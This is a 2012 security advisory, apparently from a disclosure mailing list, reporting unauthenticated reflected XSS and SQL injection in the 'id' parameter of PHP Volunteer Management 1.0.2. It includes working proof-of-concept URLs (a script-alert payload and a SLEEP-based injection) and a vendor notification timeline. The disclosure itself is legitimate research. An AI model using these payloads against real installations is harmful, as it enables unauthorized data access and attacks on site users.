PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities



# Exploit Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
# Date: 04/21/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Version: 1.0.2
# Category: webapp (php)
#

##### ToC #####

0x01 Description
0x02 XSS
0x03 SQL Injection
0x04 Vendor Notification

##### 0x01 Description #####

This is a PHP Volunteer Management software. Keep track of Volunteer
hours worked and location assignments. This system is built on
PHP/MySql.

##### 0x02 XSS #####

---------------Vulnerability-------------------

The 'id' parameter on the get_hours.php page is vulnerable to XSS. No
authentication is needed. This is a reflective XSS vulnerability.

----------Exploit-----------------------------------

http://localhost/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10

------------PoC---------------------------

http://localhost/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10

##### 0x03 SQL Injection #####

---------------Vulnerability-------------------

The 'id' parameter on the get_hours.php page is also vulnerable to SQL
Injection. No authentication is needed.

----------Exploit-----------------------------------

http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10

------------PoC---------------------------

http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10

##### 0x04 Vendor Notification #####

4/21/12 - Vendor Notified
4/24/12 - Vendor reponded, OK to Disclose



Relevant Pages

  • Kongreg8 1.7.3 Mutiple XSS
    ... Kongreg8 1.7.3 has multiple XSS vulnerabilites. ... XSS vulnerabilities. ...
    (Bugtraq)
  • RE: [Full-disclosure] RE:DONT SEND ME AGAIN PLS
    ... XSS vulnerabilities in Google.com ... XSS vulnerabilities in Google.com (GroundZero Security) ... It lists the folks that they might ...
    (Full-Disclosure)
  • Re: [Full-disclosure] XSS vulnerabilities in Google.com
    ... XSS will always remain part of the Full-Disclosure list if little ... > are we starting to post vulnerabilities in specific websites now rather than ... when using UTF-7 encoded payloads. ... > The server response lacks charset encoding enforcement, ...
    (Full-Disclosure)
  • [Full-disclosure] XSS vulnerabilities via errors at requests to DB
    ... Let's continue a series of my articles about the most common places of XSS. ... Earlier I wrote already about XSS vulnerabilities at 404 pages ... needed to use not script tag, but body tag to conduct XSS attack, so the ... code will be completely showed in message about error in SQL query. ...
    (Full-Disclosure)
  • Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB
    ... Let's continue a series of my articles about the most common places of XSS. ... Earlier I wrote already about XSS vulnerabilities at 404 pages ... in messages about errors at requests to databases (XSS via SQL Error). ... needed to use not script tag, but body tag to conduct XSS attack, so the ...
    (Full-Disclosure)